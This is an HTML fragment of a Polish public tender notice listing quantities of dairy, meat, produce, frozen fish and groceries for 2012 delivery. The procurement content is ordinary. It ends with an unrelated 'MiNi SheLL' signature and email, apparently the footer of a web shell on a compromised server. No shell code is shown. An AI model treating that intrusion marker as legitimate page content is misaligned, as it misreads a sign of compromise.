<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Produkty mleczarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Serek o smaku truskawkowym, waniliowym, jabłkowym, o gramaturze 4 x 50g, typu Danonek lub równoważny	op.	240
Deser mleczny, czekoladowy,  o gramaturze 4 x 55g,  typu Monte  lub równoważny	op.	120
Jogurt owocowy o gramaturze 120 g, truskawka, wanilia, typu Danon Gratka lub równoważny	szt.	640
Jogurt owocowy o gramaturze 125g, wanilia, truskawka, morel, typu Zott Serduszko lub równoważny	szt.	480
Jogurt do picia, truskawka, o gramaturze 400g, typu Mlekovita lub równoważny	szt.	250
Kefir naturalny o gramaturze 400g	szt.	150
Miksełko łaciate, kostka o gramaturze 200 g, typu Mlekpol lub równoważne	szt.	830
Masło klarowne o gramaturze 500g, typu Mlekovita lub równoważne	szt.	20
Maślanka owocowa o gramaturze 1 l	szt.	24
Mleko 3,2 %, pasteryzowane, karton o pojemnośli 1l	l	2100
Krem do smarowania pieczywa czekoladowo-orzechowy, o gramaturze 230g, typu Nutella lub równoważny	szt.	48
Twaróg, półtłusty, pakowany próżniowo, typu Rawicz lub równoważny	kg	60
Ser biały śmietankowy, pakowany próżniowo, o gramaturze 250g	kg	50
Ser topiony w plastrach, o gramaturze 150 g, typu Hochland Gouda, Tost, Cheddar lub równoważne	szt.	95
Ser topiony do smarowania Gouda, o gramaturze 150g, typu Mlekovita lub równoważny	szt.	140
Ser żółty typu Gouda lub równoważne	kg	25
Serek homogenizowany o gramaturze 125 - 140g,  waniliowy, truskawkowy, typu Danio lub równoważne	szt.	320
Śmietana 18% o gramaturze 380 - 400g	szt.	600
Twarożek śmietankowy o gramaturze 150g, typu Almette lub równoważny	szt.	80.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Mięso i przetwory mięsne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Łopatka wieprzowa bez kości	kg	380
Pałki z kurczaka	kg	40
Piersi z kurczaka - filet, płaty pojedyńcze lub podwójne, bez przylegającej skóry	kg	130
Porcje rosołowe - porcje rosołowe z szyją	kg	340
Schab wieprzowy bez kości	kg	80
Udka z kurczaka	kg	40
Wątróbka drobiowa	kg	20
Szynka wieprzowa bez kości	kg	70
Wędliny
Kiełbasa typu krakowska sucha, wieprzowa	kg	15
Kiełbasa typu szynkowa, wieprzowa, grubo rozdrobniona	kg	10
Kiełbasa typu żywiecka	kg	10
Kiełbaski drobiowe, o gramaturze 400g, typu Drobimex lub równoważne	szt.	60
Ogonówka	kg	15
Parówki drobiowe, o gramaturze 400g, typu Animex Bobaski lub równoważne	szt.	200
Pasztet drobiowy, typu Prochowicki lub równoważny	szt.	60
Pasztet wieprzowy	szt.	60
Polędwica drobiowa	kg	15
Polędwica typu sopocka	kg	15
Szynka drobiowa	kg	15
Szynka wieprzowa tradycyjna, wędzona	kg	15
Kiełbasa grilowa	kg	40
Kiełbaski frankfurterki	kg	40
Kości wędzone	kg	15.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Warzywa i owoce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Arbuz	kg	40
Banan	kg	300
Rzodkiew biała	kg	25
Brokuł	kg	40
Brzoskwinie	kg	10
Buraczki czerwone	kg	200
Cebula	kg	45
Cytryna	kg	25
Czosnek	kg	2
Gruszka	kg	30
Jabłko	kg	550
Kapusta biała	kg	135
Kapusta czerwona	kg	45
Kapusta pekińska	kg	55
Kiwi	szt.	670
Koper - nać	szt.	15
Mandarynka	kg	85
Marchew	kg	380
Nektaryna	kg	25
Ogórek zielony	kg	70
Papryka czerwona	kg	20
Pietruszka korzeń	kg	200
Pomarańcza	kg	110
Pomidor	kg	60
Por	kg	50
Rzodkiewka	szt.	120
Sałata	szt.	80
Seler	kg	125
Szczypior pęczek	szt.	20
Truskawki	kg	30
Winogrono	kg	20
Ziemniaki	kg	2700
Kalafior	kg	20
Fasola szparagowa	kg	20
Kukurydza kolby	szt.	200
Cukinia	kg	10
Brukselka	kg	10
Śliwka	kg	40
Maliny opakowania o gramaturze 250g	szt.	30
Porzeczki czerwone	kg	30
Wiśnie	kg	30
Czereśnie	kg	10
Porzeczki czarne	kg	30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Mrożonki i ryby.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Brokuł mrożony, różyczki, opakowanie 2 kg 	kg	20
Bukiet warzyw (marchew, kalafior, brokuł) pakowane 2 kg	kg	30
Fasola żółta szparagowa, pakowana 2 kg	kg	80
Frytki opakowanie 2,5 kg	kg	30
Kalafior mrożony, różyczki, pakowany 2 kg	kg	80
Marchew mini, pakowane 2 kg	kg	20
Mieszanka jarzynowa 7-składnik. 	kg	15
Zupa jarzynowa, pakowane 2 kg, typ Hortex lub równoważne	kg	70
Ryby
Filet z dorsza	kg	50
Filet z miruny	kg	50
Filet z morszczuka	kg	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Różne produkty spożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Barszcz biały o gramaturze 66 g, typu Winiary lub równoważny	szt.	160
Barszcz biały - zaprawa o gramaturze 500g	szt.	32
Koncentrat Barszcz z buraka czerwonego o gramaturze 300ml, typu Krakus lub równoważny	szt.	30
Batonik czekoladowy o gramaturze 23,5g, typu Milky Way lub równoważny	szt.	200
Biszkopty okrągłe o gramaturze 120g	szt.	80
Bita śmietana - spray	szt.	25
Budyń śmietankowy bez cukru	szt.	275
Chrupki kukurydziane o gramaturze 80g	szt.	80
Chrupki kukurydziane o smaku toffi o gramaturze 70g, typu Tygryski lub równoważne	szt.	50
Ciastka delicje o gramaturze 135g, typu Party lub równoważne	szt.	55
Ciastka o gramaturze 30g, typu Petitki Lubisie lub równoważne	szt.	200
Herbatniki wyborowe o gramaturze 140g	szt.	35
Ciastko z cukrem	szt.	30
Cukier  kryształ 1 kg	kg	240
Cukier puder 500g	szt.	10
Cukier waniliowy o gramaturze 30g	szt.	20
Czekoladki o gramaturze 50g, typu Kinder lub równoważne	szt.	100
Dżem niskosłodzony, o smaku truskawka, wiśnia, morela lub brzoskwinia, o gramaturze 300g, typu Łowicz lub równoważny	szt.	35
Galaretka truskawka, cytryna, pomarańcza, agrest	szt.	85
Groszek konserwowy, pojemność 400g	szt.	20
Grzyby suszone  Podgrzybki 20g	szt.	2
Herbatniki szkolne	szt.	65
Kapusta kiszona 1kg	kg	60
Kasza gryczana o gramaturze 4x100g typu Sonko lub równoważna	szt.	60
Kasza jęczmienna wiejska, o gramaturze 4x100g  typu Sonko lub równoważna	szt.	90
Kasza manna błyskawiczna, o gramaturze 400g, typu Kupiec lub równoważna	szt.	25
Ketchup łagodny, o gramaturze 500g, typu Tortex lub równoważny	szt.	70
Kisiel bez cukru, wiśnia, truskawka, cytryna	szt.	100
Kukurydza konserwowa, pojemność 400 g, typu Dawtona lub równoważna	szt.	30
Lizak czekoladowy	szt.	100
Makaron nitki o gramaturze 250 g, typu Czarnecki lub równoważny	szt.	160
Makaron gwiazdki o gramaturze 250g, typu Czarnecki lub równoważny	szt.	15
Makaron łazankowy 250g, Lubella lub podobny	szt.	15
Makaron świderki, o gramaturze 500g, typu Lubella lub równoważny	szt.	40
Makaron wstążki, o gramaturze 500g, typu Lubella lub równoważny	szt.	40
Marmolada wieloowocowa, miękka, o gramaturze  500g	kg	5
Marmolada wieloowocowa, miękka, o gramaturze  1000g	kg	5
Mąka tortowa 1kg, typ 450, Dolnośląska lub równoważna	szt.	220
Mąka ziemniaczana 500g	szt.	15
Mikołaj czekoladowy	szt.	100
Miód wielokwiatowy	szt.	10
Ogórek kwaszony - słoik o gramaturze 710 g typu Luniak lub równoważne	szt.	150
Olej uniwersalny,o gramaturze 1l,  typu ARO lub równoważny	l	200
Oliwa z oliwek z pierwszego tłoczenia	l	10
Paluszki 300 g, solone, Lajkonik Junior lub podobne	szt.	30
Płatki gwiazdki cynamonowe,o gramaturze 250g, typu Mlekołaki lub równoważne	szt.	40
Płatki kólka zbożowe, o gramaturze 250g, typu Mlekołaki lub równoważne	szt.	80
Płatki kukurydziane, o gramaturze 500 g, typu Corn Flakes Nestle lub równoważne	szt.	90
Płatki kulki czekoladowe, o gramaturze 250g, typu Mlekołaki lub równoważne	szt.	80
Płaki muszelki czekoladowe, o gramaturze 250g, typu Mlekołaki lub równoważne	szt.	80
Płatki owsiane błyskawiczne	szt.	10
Posypka dekoracyjna	szt.	5
Przecier pomidorowy 30 % o gramaturze 200 g, typu Pudliszki, Łowicz lub równoważne	szt.	50
Przecier pomidorowy 30 % o gramaturze 400 g, typu Pudliszki, Łowicz lub równoważne	szt.	30
Przecier szczawiowy 200g	szt.	30
Ryż biały długoziarnisty, o gramaturze 4x100g  typu Sonko lub równoważny	szt.	200
Sól warzona, jodowana, drobna, 1 kg	kg	100
Wafle Grześki o gramaturze 39g, typu Jutrzenka lub równoważne	szt.	320
Żurek - zaprawa,o gramaturze 500g	szt.	20
Fasola drobna 500 g	szt.	30
Groch   500 g	szt.	30
Majonez dekoracyjny o gramaturze 400g, typu Winiary lub równoważny	szt.	35
Bułka tarta  500g	szt.	140
Makrela wędzona - tusz e średnie	kg	20
Szprot w pomidorach w puszce	szt.	20
Tunczyk w oleju	szt.	20
Makrela w pomidorach w puszce	szt.	20
Śledzie po wiejsku	kg	20
Herbata czarna, ekspresowa, 200 torebek, typu Saga lub równoważna	szt.	7
Herbata owocowa, ekspresowa, 50 torebek, typu Saga lub równoważna	szt.	40
Kakao rozpuszczalne typu Puchatek lub równoważne	szt.	30
Kawa zbożowa instant  typu Inka Junior lub równoważna	szt.	10
Kawa zbożowa expresowa, 35 torebek, typu Anatol lub równoważna	szt.	10
Napoje
Kompot truskawkowy, wiśniowy, czarna porzeczka, o gramaturze 900 ml, typu Global lub równoważny	szt.	600
Sok/nektar owocowy, o gramaturze1,5 l, typu Tymbark lub równoważny	szt.	100
Sok owocowy o pojemności 2l, typu Caprio lub równoważny	szt.	50
Sok owocowy o pojemności 900ml, typu  Pysio, Kubuś lub równoważny	szt.	250
Syrop owocowy o smaku truskawkowym, pomarańczowym, malinowym, wiśniowym, brzoskwiniowym, cytrynowym, pojemność 440 ml, typu Łowicz lub równoważny	szt.	400
Woda niegazowana o pojemności 5l	szt.	10
Przyprawy
Bazylia	szt.	5
Cynamon mielony	szt.	10
Czosnek granulowany	szt.	30
Kminek	szt.	5
Koper suszony o gramaturze 6 g, typu Prymat lub równoważny	szt.	20
Przyprawa Kucharek o gramaturze 1kg, typu Prymat lub równoważna	szt.	20
Kwasek cytrynowy	szt.	30
Liście lauroweo gramaturze 10g	szt.	15
Przyprawa w płynie do zup o gramaturze 1 kg, typu Winiary lub równoważna	szt.	15
Majeranek o gramaturze 10g	szt.	35
Musztarda stołowa, o gramaturze 200g	szt.	10
Oregano	szt.	5
Papryka słodka	szt.	15
Papryka ostra	szt.	5
Pieprz czarny, mielony, naturalny, o gramaturze 20g	szt.	45
Pieprz ziołowy, o gramaturze 20 g	szt.	10
Pietruszka suszona  - natka, o gramaturze 240g, typu Anton lub równoważna	szt.	5
Przyprawa do kurczaka o gramaturze 30g, typu Prymat lub równoważna	szt.	30
Przyprawa do mięsa mielonego typu Prymat lub podobna	szt.	35
Przyprawa do mięsa wieprzowego typu Prymat lub podobna	szt.	35
Przyprawa do ryb typu Prymat lub podobna	szt.	25
Soda oczyszczona	szt.	5
Ziele angielskie, o gramaturze 15g	szt.	25
Zioła prowansalskie	szt.	15.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com